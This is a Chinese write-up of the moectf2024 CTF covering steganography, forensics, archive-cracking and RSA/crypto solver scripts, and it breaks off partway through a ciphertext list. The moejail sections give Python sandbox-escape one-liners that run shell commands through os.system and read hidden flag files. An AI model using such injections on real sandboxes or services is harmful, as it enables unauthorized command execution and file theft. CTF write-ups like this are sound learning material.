moectf2024

本文最后更新于 2024年10月13日 凌晨

个人排名第25,后期就没怎么打了,复盘整理一下。

0基础入门

看完pdf,在群里输入识别码,获得flag

1

安全杂项

signin

登入网址,按照要求,给luo选择缺勤,其他签到

注意:完成所有要求再提交

罗小黑战记

打开发现是GIF,帧数藏图片,用工具提取内容

a b c

最后扫码得到 moectf{y0uu6r3th3m0st3r1nth1sf13ld}

杂项入门指北

得到海豹图片,尝试多种未果,注意到图片观察。其实有一段莫斯密码

1
.... ....- ...- . ..--.- .- ..--.- --. ----- ----- -.. ..--.- - .---- -- .

haibao

moectf{H4VE_A_G00D_T1ME}

ez_F5

头一次见这种隐写

先看到属性里面有编码,base32解密得到no_password,010打开进行分析,在里面看到提示

F5

网上搜索一下是F5隐写,下载工具,上面的是密码得到flag

F5-1

moectf{F5_15_s0_lntere5t1n9}

so many ‘m’

字频统计的题目,写一个脚本出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from collections import Counter


def char_frequency_sort(text):
    # 统计每个字符的频率
    frequency = Counter(text)

    # 按照频率从高到低排序,如果频率相同则按字典序排序
    sorted_chars = sorted(frequency.items(), key=lambda x: (-x[1], x[0]))

    # 拼接成排序后的字符序列
    result = ''.join(char for char, count in sorted_chars)

    return result


# 测试输入
text = "a!{ivlotzkEm{CtsvEpbDkwexsotyMuECs!mvlhmenrhwpMh0leydsMbC#CC}sii}tkb}ugCD{zlEeT#kyC0fbukglpopmaekbEthmjcMdsgkvmTnC}eot#dcf{ec@ccgqpfqMycysMuuou!en#{g0cDmoyxTCMgt{joT{jnl0rhoklCe{n0CnxprydeaTg0r{avkEjckjEsxhaohs{Trbkr!ffqip444uwrc}nnevgtCT{jCipogtipzdeDiqsy44rMfj{MzCw#qwg{T4m{cuk!hwuncxdmddeurtsojakrjC#vTDd}0poTT@c!DftjwuDp@mcuheeDtfao!iEcEq}kcf#Mpcam{mml4i4mpDnedamcwtC0nem{mDotnmp4jf@TpxfqMoiqwtdijDfimmCzmxe#gsTu{poeTEhD!u0anvTTTbbi{q}zapcksMifDlovoeac@{0keh0dg{Mi!@tfftqitmuMoMcuTpmcgnmozyrrv#zfmzmetyxxa0wczE}eoD{xcMnoCuebu0otdusiDknfvo0{fEsMftzT!eoslegbypspC4vkxm#uaf@acuemhMyiDou#at0rfl4a}0ixeEktws}pMCfCigaTafg}ffssmwwuTkTuls0{M@c4e@{D{tuorzmyqptChpngkeCohCCMTwqctinc0mcjemclv@cMoqf00poarte@oqmuysm#mo{et4kcCpcgcT}vD}m!g4{E0!Mol0fpo!{srT0pf{cMuCx0bp{ftTmExcrn}0etonez!@C4tfa4aM00siztb@fomfD#{#tMbo@jgb4CM0dEk0tea4aMCafn"

# 获取结果并输出
result = char_frequency_sort(text)
print(result)

捂住一只耳

wav音频,先用audi代开,没发现波纹图的问题,大约在1min的时候会有数字读写,看了hint才猜出,按键盘上字母对应的列行,如63就是字母第六列第三行,即n

1
63 31 43 31 41 52 31 51 71 101

最后的flag为moectf{nevergetup}

Abnormal lag

这里用adu打开发现多频图里面有内容,需要进行观察得到flag,友情提醒的是字符只有a-f和数字

lag1

lag2

尝试后得到moectf{09e3f7f8-c970-4c71-92b0-6f03a677421a}

moejail_lv1

1
__import__('os').system('ls -al /tmp')

读取文件

1
__import__('os').system('cat /tmp/.therealflag_*')

得到flag

moejail_lv2

用1一样的第一条先查看一下

1
__import__('os').system('ls -al /tmp')

发现root权限可以看

1
print(open('/tmp/therealflag_b8c7f31438c67cea772d2ea57dc77918').read())

moejail_lv3

试了一下lv3,用2的代码可以打通,就不多赘述了

The upside and down

010发现是逆转,写个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# # 以二进制模式读取文件内容
with open('C:/Users/30226/Desktop/a.txt', 'rb') as f:
     content = f.read()

 # 反转文件内容
reversed_content = content[::-1]
with open('C:/Users/30226/Desktop/new.txt', 'wb') as new_file:
      new_file.write(reversed_content)
with open('new.txt', 'r') as file:
    lines = file.readlines()

lines = [line for line in lines if line.strip()]

# 将过滤后的内容写回文件
with open('new.txt', 'w') as file:
    file.writelines(lines)

扫一下得到flag

new

https://balabala_towards:moectf{Fri3nds_d0n't_lie!}//

the_secret_of_snowball

010打开开头改为FFD8,

得到第一段

第二段在010底部base64解密拼接得到flag

解不完的压缩包

先写脚本得到最后一层压缩包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import os
import zipfile

def extract_zip_file(zip_name, output_dir):
    with zipfile.ZipFile(zip_name, 'r') as zipf:
        zipf.extractall(output_dir)
def main():
    output_dir = "."  # 使用当前目录进行解压
    prev_extracted_file = None
    for i in range(999, 0, -1):
        zip_name = f"{i}.zip"

        if not os.path.exists(zip_name):
            print(f"Error: The file '{zip_name}' does not exist.")
            return

        # Extract the current zip file
        extract_zip_file(zip_name, output_dir)

        if prev_extracted_file:
            # Delete the previously extracted zip file
            os.remove(prev_extracted_file)

        prev_extracted_file = zip_name

    print("All zip files have been extracted and processed.")

if __name__ == "__main__":
    main()

根据压缩包名称的提示,crc碰撞

利用Zipcrack.py进行爆破

得到key *m:#P7j0

最后解密得到flag

moectf{af9c688e-e0b9-4900-879c-672b44c550ea}

每人至少300份

一直在想脚本没看图片,然后利用word文档就行了简单的拼接,扫码得到一串字符,分析一会后发现了是base58加密得到了flag这题之后会有修复题

300问卷

balabalballablblablbalablbalballbase58lblblblblllblblblblbalblbdjshjshduieyrfdrpieuufghdjhgfjhdsgfsjhdgfhjdsghjgfdshjgfhjdgfhgdh///key{3FgQG9ZFteHzw7W42}??

key里面的内容进行解密得到flag.

readme

/proc/self/fd/3

Find It

orz这题历时写了很长时间,总结就是其实和图片没什么关系,直接看hint

做题流程:豆包搜索西安带”的”的幼儿园,跳出了吉的堡幼儿园,简单的百度地图搜一下几个位置,发现有个小区有两个吉的堡幼儿园,最后拼写的就是moectf{ji_di_bao_you_er_yuan}

ez_Forensics

取证这一块我没这么了解过

按流程正常输入一些内容就行(毕竟这个比较简单)

拖入虚拟机使用vol

常见的先看看什么镜像

vol.py -f ../flag.raw imageinfo

得到镜像折后可以看一下进程

vol.py -f ../flag.raw --profile=Win7SP1x64 pslist

可以注意到cmd.exe,根据题目的提示,我们需要得到cmd里面的flag

进行cmdscan扫描

vol.py -f ../flag.raw --profile=Win7SP1x64 cmdscan

得到了flag

1
2
3
4
5
6
7
8
9
CommandProcess: conhost.exe Pid: 2268
CommandHistory: 0x32b0a0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 @ 0x330410: echo moectf{WWBGY-TLVC5-XKYBZ} > flag.txt
Cmd #1 @ 0x30cec0: echo SJW7O^%gt8 > flag.txt
Cmd #2 @ 0x3350b0: del flag.txt
**************************************************

ctfer2077①

先扫看看发现没有东西,用steg看一下,发现有一处有一串内容,data分析一下得到flag

ctfer2077-1

moectf{84d7f247-3cba-4077-ba25-079f3ac7bb8a}

ctfer2077②

加密卷用veracrpt进行解密,然后使用DiskGenius进行恢复文件得到一段内容,打开发现没有明显的内容,估计是被删了,去修复一下。有一个小鹤.txt的文件,内容是

1
2
3
ulpb vfde hfyz yisi buuima
key jqui xxmm vedrhx de qrpb xnxp
ulpb ui veyh dazide

经过分析是双拼打的字,进行简单分析得到key

shuangpinshizheyangdazide

加个moectf就是flag

ctfer2077③

流量包导出内容,然后upload文件利用foremost解开得到压缩包,解压得到一些文件。

有个gif动图隐约能看见有字提取一下内容,得到key:C5EZFsC6

正常用aud打开发现没什么内容,注意是MP3文件,尝试用MP3stego解密

mp3

得到了文件,是brainfuck转text的内容,得到了字符串H5gHWM9b

解开压缩包是3个txt文件,缩小观察是福尔摩斯小人,上图片

福尔摩斯

挨个对应然后输入就是以下字符串,最后套个moectf{}

people_dancing_happily

现代密码学

现代密码学入门指北

根据文本写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from Crypto.Util.number import long_to_bytes, inverse

# 给定的参数
p = 197380555956482914197022424175976066223
q = 205695522197318297682903544013139543071
n = 40600296529065757616876034307502386207424439675894291036278463517602256790833
e = 65537
c = 36450632910287169149899281952743051320560762944710752155402435752196566406306

# 计算 φ(n)
phi = (p - 1) * (q - 1)

# 计算解密指数 d
d = inverse(e, phi)

# 解密密文 c 得到明文 m
m = pow(c, d, n)

# 将明文 m 转换为字节
flag = long_to_bytes(m)

# 输出解密的结果
print(flag.decode())

Signin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from Crypto.Util.number import inverse, long_to_bytes, GCD
from sympy import symbols, solve

# 先定义已知的变量
c = 5654386228732582062836480859915557858019553457231956237167652323191768422394980061906028416785155458721240012614551996577092521454960121688179565370052222983096211611352630963027300416387011219744891121506834201808533675072141450111382372702075488292867077512403293072053681315714857246273046785264966933854754543533442866929316042885151966997466549713023923528666038905359773392516627983694351534177829247262148749867874156066768643169675380054673701641774814655290118723774060082161615682005335103074445205806731112430609256580951996554318845128022415956933291151825345962528562570998777860222407032989708801549746
pq = 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687154230787854196153067547938936776488741864214499155892870610823979739278296501074632962069426593691194105670021035337609896886690049677222778251559566664735419100459953672218523709852732976706321086266274840999100037702428847290063111455101343033924136386513077951516363739936487970952511422443500922412450462
qp = 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687077087914198877794354459669808240133383828356379423767736753506794441545506312066344576298453957064590180141648690226266236642320508613544047037110363523129966437840660693885863331837516125853621802358973786440314619135781324447765480391038912783714312479080029167695447650048419230865326299964671353746764860
n = 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687534959910892789661065614807265825078942931717855566686073463382398417205648946713373617006449901977718981043020664616841303517708207413215548110294271101267236070252015782044263961319221848136717220979435486850254298686692230935985442120369913666939804135884857831857184001072678312992442792825575636200505903
p_q = 279533706577501791569740668595544511920056954944184570513187478007551195831693428589898548339751066551225424790534556602157835468618845221423643972870671556362200734472399328046960316064864571163851111207448753697980178391430044714097464866523838747053135392202848167518870720149808055682621080992998747265496
e = 65537

# 恢复 p 和 q
x = symbols('x')
equation = x**2 - p_q*x + n
solutions = solve(equation, x)
p = int(solutions[0])
q = int(solutions[1])

# 计算 φ(n)
phi_n = (p - 1) * (q - 1)

# 计算私钥 d
d = inverse(e, phi_n)

# 解密消息
m = pow(c, d, n)
flag = long_to_bytes(m)

print(f"Recovered flag: {flag.decode()}")

Big and small

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from Crypto.Util.number import long_to_bytes
import gmpy2

# 给定的c, e, n
c = 150409620528288093947185249913242033500530715593845912018225648212915478065982806112747164334970339684262757
e = 3
n = 20279309983698966932589436610174513524888616098014944133902125993694471293062261713076591251054086174169670848598415548609375570643330808663804049384020949389856831520202461767497906977295453545771698220639545101966866003886108320987081153619862170206953817850993602202650467676163476075276351519648193219850062278314841385459627485588891326899019745457679891867632849975694274064320723175687748633644074614068978098629566677125696150343248924059801632081514235975357906763251498042129457546586971828204136347260818828746304688911632041538714834683709493303900837361850396599138626509382069186433843547745480160634787

# 使用 gmpy2 提供的立方根计算函数
m, exact = gmpy2.iroot(c, e)

# 如果立方根是精确的,我们可以直接获取明文
if exact:
    flag = long_to_bytes(m)
    print(flag)
else:
    print("密文可能无法直接解密,或者立方根不精确。")

ez_hash

给的提示其实因为是qq号所以都是数字,直接爆破就好

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from hashlib import sha256
# 给定的哈希值
target_hash = '3a5137149f705e4da1bf6742e62c018e3f7a1784ceebcb0030656a2b42f50b6a'
# 已知的秘密开头
prefix = b'2100'
# 暴力破解可能的秘密
for i in range(1000000):  # 从 000000 到 999999
    # 格式化为 6 位数字,不足的前面补零
    suffix = f'{i:06}'.encode()
    secrets = prefix + suffix
    # 计算 SHA-256 哈希值
    hash_value = sha256(secrets).hexdigest()
    # 检查哈希值是否匹配
    if hash_value == target_hash:
        print(f"Found secrets: {secrets.decode()}")
        break

baby_equation

首先对这个进行化简
$$
((a^2 + 1)(b^2 + 1) - 2(a - b)(ab - 1)) == 4*(k + a*b)
$$

$$
(a+1)^2(b-1)^2=4k
$$

然后还有求a,b

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import gmpy2
from Crypto.Util.number import long_to_bytes


def find(tot, index, ls):
    """
    递归查找函数,用于寻找合适的因子组合,使得通过这些因子构造出的数字能够还原出 flag。
    :param tot: 当前的乘积值(初始值为1)。
    :param index: 当前处理的因子索引。
    :param ls: 因子列表,包含所有可能的因子。
    :return: 满足条件的乘积值,如果未找到则返回0。
    """
    # 基准情况:如果已经检查了所有因子
    if index == len(ls):
        # 检查当前的 tot 是否可能包含 flag 的特征字符串(例如 'moectf{')
        if b'moectf{' in long_to_bytes(tot):
            return tot  # 返回找到的值
        return 0  # 没找到返回 0

    # 递归查找,尝试包含当前因子的情况
    a = find(tot * ls[index], index + 1, ls)
    # 递归查找,尝试不包含当前因子的情况
    b = find(tot, index + 1, ls)

    # 返回找到的非零结果
    return a if a != 0 else b


# 给定的常量 k 值
k = 0x2227e398fc6ffcf5159863a345df85ba50d6845f8c06747769fee78f598e7cb1bcf875fb9e5a69ddd39da950f21cb49581c3487c29b7c61da0f584c32ea21ce1edda7f09a6e4c3ae3b4c8c12002bb2dfd0951037d3773a216e209900e51c7d78a0066aa9a387b068acbd4fb3168e915f306ba40

# 计算 a1b1 = sqrt(4 * k)
a1b1 = gmpy2.iroot(4 * k, 2)[0]

# 因子列表,包含可能分解出的因子组合
fac = [
    2, 2, 2, 2, 3, 3, 31, 61, 223, 4013, 281317, 4151351, 339386329, 370523737,
    5404604441993, 26798471753993, 25866088332911027256931479223,
    64889106213996537255229963986303510188999911
]

# 使用递归查找因子组合,得到 a1
a1 = find(1, 0, fac)

# 计算 b1 = a1b1 // a1
b1 = a1b1 // a1

# 使用 long_to_bytes 将 a1 和 b1 转换为字节并输出 flag
print(long_to_bytes(a1 - 1) + long_to_bytes(b1 + 1))

new_system

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import gmpy2
from Crypto.Util.number import long_to_bytes

# 给定的值
a1, c1 = [48152794364522745851371693618734308982941622286593286738834529420565211572487, 21052760152946883017126800753094180159601684210961525956716021776156447417961]
a2, c2 = [48649737427609115586886970515713274413023152700099032993736004585718157300141, 6060718815088072976566240336428486321776540407635735983986746493811330309844]
a, c = [30099883325957937700435284907440664781247503171217717818782838808179889651361, 85333708281128255260940125642017184300901184334842582132090488518099650581761]
q = 105482865285555225519947662900872028851795846950902311343782163147659668129411

b = (c - c1 - c2) % q
d = (a - a1 - a2) % q

assert b > 0
assert d > 0
assert gmpy2.gcd(d, q) == 1
inv_d = gmpy2.invert(d, q)
x = (b * inv_d) % q
print(f"The value of x is: {x}")

gift = (c - a * x) % q
print(long_to_bytes(gift))

RSA_revenge

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from Crypto.Util.number import long_to_bytes
import gmpy2

# 给定的数值
n = 141326884939079067429645084585831428717383389026212274986490638181168709713585245213459139281395768330637635670530286514361666351728405851224861268366256203851725349214834643460959210675733248662738509224865058748116797242931605149244469367508052164539306170883496415576116236739853057847265650027628600443901
c = 47886145637416465474967586561554275347396273686722042112754589742652411190694422563845157055397690806283389102421131949492150512820301748529122456307491407924640312270962219946993529007414812671985960186335307490596107298906467618684990500775058344576523751336171093010950665199612378376864378029545530793597
e = 65537

# 初始的 Brute Force 用于寻找 p 和 q
def brute_force(a, b, k):
    if k == 256:
        if a * b == n:
            print(f'找到因子: a={a}, b={b}')
            return a, b
        return 0

    for i in range(2):
        for j in range(2):
            a1 = a + i * (2 ** (511 - k)) + j * (2 ** k)
            b1 = b + j * (2 ** (511 - k)) + i * (2 ** k)

            if a1 * b1 > n:
                continue

            if (a1 + 2 ** (511 - k)) * ((b1 + 2 ** (511 - k))) < n:
                continue

            if (a1 * b1) % (2 ** (k + 1)) != n % (2 ** (k + 1)):
                continue

            result = brute_force(a1, b1, k + 1)
            if result:
                return result

    return 0

# 调用 Brute Force 函数来找到 p 和 q
p, q = brute_force(0, 0, 0)

# RSA 解密函数
def decrypt_rsa(p, q, c, e):
    # 计算模数 n 和 Euler's totient (phi)
    n = p * q
    phi = (p - 1) * (q - 1)

    # 计算私钥 d
    d = gmpy2.invert(e, phi)

    # 使用私钥解密密文
    m = pow(c, d, n)
    return long_to_bytes(m)

# 解密并打印结果
plaintext = decrypt_rsa(p, q, c, e)
print(f'解密后的明文: {plaintext.decode()}')

ezlegendre

对于密文中的每个数字 n,我们计算 (n-a | p) 的勒让德符号。

如果勒让德符号为 1,则对应的原始比特为 1;否则为 0。

我们将所有解密出的比特拼接成一个二进制字符串。

最后,我们将二进制字符串每8位转换为一个ASCII字符,得到最终的明文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from sympy import legendre_symbol
def decrypt_flag(ciphertext, p, a):
    plaintext = ""
    for n in ciphertext:
        # 计算勒让德符号 (n|p) 和 (a|p)
        leg_n = legendre_symbol(n, p)
        leg_a = legendre_symbol(a, p)

        # 如果 (n|p) == (a|p),则原始比特为 0,否则为 1
        bit = '0' if leg_n == leg_a else '1'
        plaintext += bit

    # 将二进制字符串转换为ASCII字符
    flag = ''
    for i in range(0, len(plaintext), 8):
        byte = plaintext[i:i + 8]
        flag += chr(int(byte, 2))

    return flag


# 给定的参数
p = 303597842163255391032954159827039706827
a = 34032839867482535877794289018590990371

# 从给定的输出中提取密文
ciphertext = [278121435714344315140568219459348432240, 122382422611852957172920716982592319058, 191849618185577692976529819600455462899, 94093446512724714011050732403953711672, 201558180013426239467911190374373975458, 68492033218601874497788216187574770779, 126947642955989000352009944664122898350, 219437945679126072290321638679586528971, 10408701004947909240690738287845627083, 219535988722666848383982192122753961, 173567637131203826362373646044183699942, 80338874032631996985988465309690317981, 61648326003245372053550369002454592176, 277054378705807456129952597025123788853, 17470857904503332214835106820566514388, 107319431827283329450772973114594535432, 238441423134995169136195506348909981918, 99883768658373018345315220015462465736, 188411315575174906660227928060309276647, 295943321241733900048293164549062087749, 262338278682686249081320491433984960912, 22801563060010960126532333242621361398, 36078000835066266368898887303720772866, 247425961449456125528957438120145449797, 843438089399946244829648514213686381, 134335534828960937622820717215822744145, 74167533116771086420478022805099354924, 249545124784428362766858349552876226287, 37282715721530125580150140869828301122, 196898478251078084893324399909636605522, 238696815190757698227115893728186526132, 299823696269712032566096751491934189084, 36767842703053676220422513310147909442, 281632109692842887259013724387076511623, 205224361514529735350420756653899454354, 129596988754151892987950536398173236050, 97446545236373291551224026108880226180, 14756086145599449889630210375543256004, 286168982698537894139229515711563677530, 100213185917356165383902831965625948491, 268158998117979449824644211372962370753, 264445941122079798432485452672458533870, 87798213581165493463875527911737074678, 131092115794704283915645135973964447801, 164706020771920540681638256590936188046, 178911145710348095185845690896985420147, 154776411353263771717768237918437437524, 260700611701259748940616668959555019434, 222035631087536380654643071679210307962, 281292430628313502184158157303993732703, 24585161817233257375093541076165757776, 269816384363209013058085915818661743171, 39975571110634682056180877801094873602, 125235869385356820424712474803526156473, 218090799597950517977618266111343968738, 144927096680470512196610409630841999788, 213811208492716237073777701143156745108, 64650890972496600196147221913475681291, 302694535366090904732833802133573214043, 214939649183312746702067838266793720455, 219122905927283854730628133811860801459, 224882607595640234803004206355378578645, 260797062521664439666117613111279885285, 279805661574982797810336125346375782066, 147173814739967617543091047462951522968, 23908277835281045050455945166237585493, 186338363482466926309454195056482648936, 295140548360506354817984847059061185817, 151948366859968493761034274719548683660, 96829048650546562162402357888582895187, 61129603762762161772506800496463804206, 83474322431616849774020088719454672415, 25094865151197136947956010155927090038, 86284568910378075382309315924388555908, 269311313874077441782483719283243368999, 293865655623484061732669067594899514872, 42618744258317592068586041005421369378, 54330626035773013687614797098120791595, 147903584483139198945881545544727290390, 290219451327796902155034830296135328101, 147951591390019765447087623264411247959, 176721307425594106045985172455880551666, 10617017342351249793850566048327751981, 166002147246002788729535202156354835048, 43653265786517886972591512103899543742, 191250321143079662898769478274249620839, 142288830015965036385306900781029447609, 231943053864301712428957240550789860578, 259705854206260213018172677443232515015, 42547692646223561211915772930251024103, 210863755365631055277867177762462471179, 140297326776889591830655052829600610449, 136970598261461830690726521708413303997, 93221970399798040564077738881047391445, 192314170920206027886439562261321846026, 95904582457122325051140875987053990027, 158334009503860664724416914265160737388, 134039922705083767606698907224295596883, 7789601161004867293103537392246577269, 261069289329878459425835380641261840913, 123743427894205417735664872035238090896, 20126583572929979071576315733108811761, 5317214299018099740195727361345674110, 68965882674411789667953455991785095270, 235934145208367401015357242228361016868, 250709310980093244562698210062174570956, 167048130489822745377277729681835553856, 122439593796334321806299678109589886368, 117953800124952553873241816859976377866, 226311466875372429157352019491582796620, 301401080214561977683439914412806833619, 255816105091394723475431389696875064495, 73243049441397892506665249226961409560, 226985189100195407227032930008331832009, 164462051705780513134747720427967016844, 97905180778488273557095248936896399883, 40737879120410802220891174679005117779, 180413920169781019749877067396006212488, 171309368917976988181007951396904157090, 215065878665354148046787050342635722874, 54225964222741166664978354789209176721, 179980445108969868669560591527220171967, 39118880593034932654127449293138635964, 170210538859699997092506207353260760212, 62152643864232748107111075535730424573, 28285579676042878568229909932560645217, 69823876778445954036922428013285910904, 170371231064701443428318684885998283021, 211884923965526285445904695039560930451, 2912793651373467597058997684762696593, 220544861190999177045275484705781090327, 142755270297166955179253470066788794096, 264271123927382232040584192781810655563, 214901195876112453126242978678182365781, 252916600207311996808457367909175218824, 176399700725319294248909617737135018444, 230677646264271256129104604724615560658, 1568101696521094800575010545520002520, 276644650735844694794889591823343917140, 185355461344975191330786362319126511681, 248497269558037476989199286642120676823, 27426372552503547932146407600438894266, 99885839446999373024614710052031031159, 238693364649026611386487480573211208980, 27047849084544903200283111147329657123, 261687609401872239323715016608713989139, 34926503987070847956303036393611830590, 252495954285655595492775877967398282722, 249358827602419141539353237669905281246, 42551212101869966935955269842854722856, 286527336123436427709115043975536071462, 158097411156207320921055042509886995091, 40982984899524424348979403377331335675, 87268254405858939730919659372073314983, 142920872841164853694746048293715385493, 280344634952903421792629929689092857993, 203584314487374069738101729666435007339, 76747904284507590577908045394001414841, 18608573158088521401404614102481693137, 104158289118605398449367221892619783009, 182616719368573751169836443225324741716, 272025723760783252166092979911587562064, 24194069309604403496494752448487752613, 71973842397785917741048132725314885345, 281558046604363121112749722271741416764, 66965324704079734796576428718112513855, 105222756356650324548621319241035836840, 331654051401420900830576011369146182, 131087815164777263900650262777429797113, 76104729920151139813274463849368737612, 163253554841934325278065946152769269296, 35973933431510942249046321254376084104, 223355354158871484030430212060934655984, 181704973473887713398031933516341967465, 131391458395622565487686089688656869743, 153029062510158353978320224242258979076, 75598349867958834632866616947240059419, 107656133091853571710502064573530657194, 261653899003034450454605322537555204702, 102387069931966536076616272953425585051, 174654548539988861301269811985320013260, 30731762585661721683653192240732246059, 265493340795853624586170054917042208660, 174818040730242275465453007894471517233, 99514915046145707535310601810631334278, 133978892607644700903700803642408771370, 216019770199630171637325931783378096100, 76687884966028369399497157007109898467, 262185741950606001987209986574269562289, 101935410844521914696784339882721918198, 85956270718878931834010975962772401589, 117578315837774870077915813512746446219, 209811226703488479967593762805568394383, 85782228978690599612110880989543246041, 234993402267259336147096170367513324439, 158487299348452041021565296682698871789, 159701431055714867184644360639841355076, 109022557288733938098734847159477770521, 20764822884655633017647117775843651332, 144987524936939260617020678038224835887, 214906746504968333094519539609226540495, 61852186870193663367998110214331582115, 90175894032076080713807606548780168998, 283504071501037047650569090140982777586, 267695305479884628857258564337611106120, 2466175482923380874813569827625743835, 62561740902965346823256447383892272796, 181458673990444296212252831090106274182, 151903421483215372136947284355251617709, 19545903652854510304023406921387221130, 219205004027218279279153442572018305650, 62495663621315535552427938857863551873, 12365469869484359722316573851483855865, 84444120685499458796249283893323932282, 240719245204462516267560756675192129462, 27868242791206675092288978266113368469, 231956104988320170956546781095814860314, 238410591787987745803829175586952288627, 290649141309468101840354611586699479851, 288298044918505512172272603794059992911, 43375655853069820305921366762777897508, 195308577786654489057887409352840304641, 184459971400898842809886506207633536394, 255884612697066296714973816950917234211, 8695922085804648269560669225439485137, 109407350389195091443836128149623969417, 40151058765649465408124869078260007620, 125484946058191366826510549493690011718, 71132588066103752922321942940739808864, 74434669478187680319595294456652807097, 187368213679294937718535073296853726111, 63461505676143678393259420949793811831, 131619805472714703711458729455838994067, 8579657158619864010437706463902003097, 60626278761876782233388469543817973673, 44776499706241603722632560896220653186, 257249861781237389988455384617803171877, 161899873165011719282095749671993720527, 73303482092538159761390536102771615311, 141674253732456103774983358188317473860, 112299149158347774069079224861237069975, 192409969047313867540459549167233638120, 52560717143548208264188844553309600513, 209294007943747095607573416682772182613, 65285862009539442533024037477398617382, 141465096635701758351979378177631042196, 282970656853503001128091562858564344839, 50475483578642585644452991078499278745, 162546597698227455939743094437394415689, 65258447920153625609456176138520078583, 25184730952052088803921023041299838584, 228883100940853988548836641050823478387, 234342509561041384559923481191578502671, 96929129863331626375704681481278825323, 288533470498072097357398960101692503873, 202238020435442160571930572760188491021, 179010548891454398845389500871076122861, 210509821764943794358893224681677583929, 301357944197101288505771002301759006254, 188933290023352627523422420332593360537, 207946655777875200521742190622482472884, 288626263488145443150622420747070805416, 75616301779108425588545170038742534166, 58163857263381687168244101022135667109, 297006021514663344215599115965804102114, 297690420826548736122127126645053452341, 88307045391242971429880119414942510712, 186427606153958359494215188169120285788, 135488686276533521058776859854524444361, 185380054960856211260651416683468161990, 175033658667416561573078028845860911744, 223026004671602541191897755812121342354, 34657268786986063209312902409995458857, 120560332690000675303295481174067849230, 55304621833927249516093996383526467671, 111480233798478730015825495041130765708, 188996716801525995463705449722399676888, 276300230605454487705048192796463035731, 195951365841304132244984630163178946841, 97383655947416522972353051984313703380, 94486945760999630041197414137963583839, 180706938513681126017333618518691884990, 291355503207799224380050183085704824037, 69034413486375685936282884707402207337, 147750870458026934714106830614187010708, 45030500748522416863096615057804736553, 242760053973560804002707125041520857401, 78549841097746795170488790352479728712, 2356186555504071026416878904180857750, 250486437623828232647064146324392061051, 23443836455198610186212360005846025976, 174557226633145985326629017377610499133, 105578481831185315088267357915446186040, 275620780071666328887795273613981325091, 23435505408737317601794562472269448966, 153209223406380813663608757935808571040, 298537417505667302508269715871007454162, 203833907122687718347615710181705388877, 41923370405573382737900061813058979798, 3762696947926387653032627637114050038, 201362054098012734707571348865729525585, 285561801443127226417656620776228615886, 111526376057659222252771678197929357387, 203857473647840873587593099562928738804, 44500972779851392967974092230683443589, 131565609415497588649207556985146740667, 118140388348838985266223643241117982200, 151449885527204880099343472664885565851, 296392921256617994387220911796693904909, 171323803851876663161606688343678019752, 77152982746512263077542395226111426871, 71648764903315646849225859605038798241, 204032734481806785543119754456569617316, 6308687907566364067313782129902290691, 16601010504475415688487155708691097587, 267844409827567109183739120606590016153, 8224746302136608660764206696943998066, 66759882079234093195284745682061177129, 246382951504754280882643835151081337286, 255668159720160142170457715248631352728, 198682585307670767869381177003851088434, 52435298055396076040371814840062860322, 71487031168170283085378067681578926209, 19270201008106231446848331516948751837, 259975200953378762173082382130139147342, 100957428421542421187997144087873975651, 208596806512779765020431672051552927799, 299145970783704112359526450087000033589, 150947534399996219237186223933189906692, 2048564430495506099844799218948689248, 18962488382754079143174369765373573160, 123031997265327646442638576943887737076, 244982544573374061178705105734141424990, 146410849043938910996544914770892579969, 223289253099676841267315311685506771609, 51374350072145272462874563304717832675, 11071799523780604861063183113721965515, 64879815349665030137608387728274669513, 80407660651138778640313857555610913997, 303240361297474032656368918727922343524, 103535171867293830164396688627880762056, 80560992291681297484967629700766125368, 143230791823232014720768325847406122476, 188716605362804777650654549500430035344, 232870220205325961834389425482865329315, 283584919111555062850512413920721407255, 206566027046056486360456937040463884619, 157265544558229360994066706355140059167, 234540100059557817987307855523008271441, 145080729935010940836509908225154438654, 87632901547252991486640361323948527297, 132851295075144433057295220850764336697, 119332580967710872282556206817561230364, 252662535367310697404410284791596079390, 116953597995893914045234747272641030589, 100249498080127826743176896590140549012, 136127222991007877469608037092253387587, 293872159333237281344632727438901916796, 188380258232793584033919525452891729603, 1610116068556601814921533488550773010, 227538093179017809788576278302184723209, 96083211912155805281570727244009758189, 177565192075026414675108774674272650977, 48610376097473152433617435307712235835, 247706157308906487216795222963091222950, 158089460554439410339817265377357657075, 242596743543458727108836420358578527964, 157838486547678450498998359338995593594, 154936428786673098370270244313756793764, 230069001282099253337070315838992422706, 302203905412042965194022309363722872023, 278925578180003228386990239779184911424, 2121847168422140085785053284950978779, 88186566913792352545205577594300112005, 127051055548524716972172930848069016819, 216775577660712694343189516378309335187, 44934779747684486400910901018161470888, 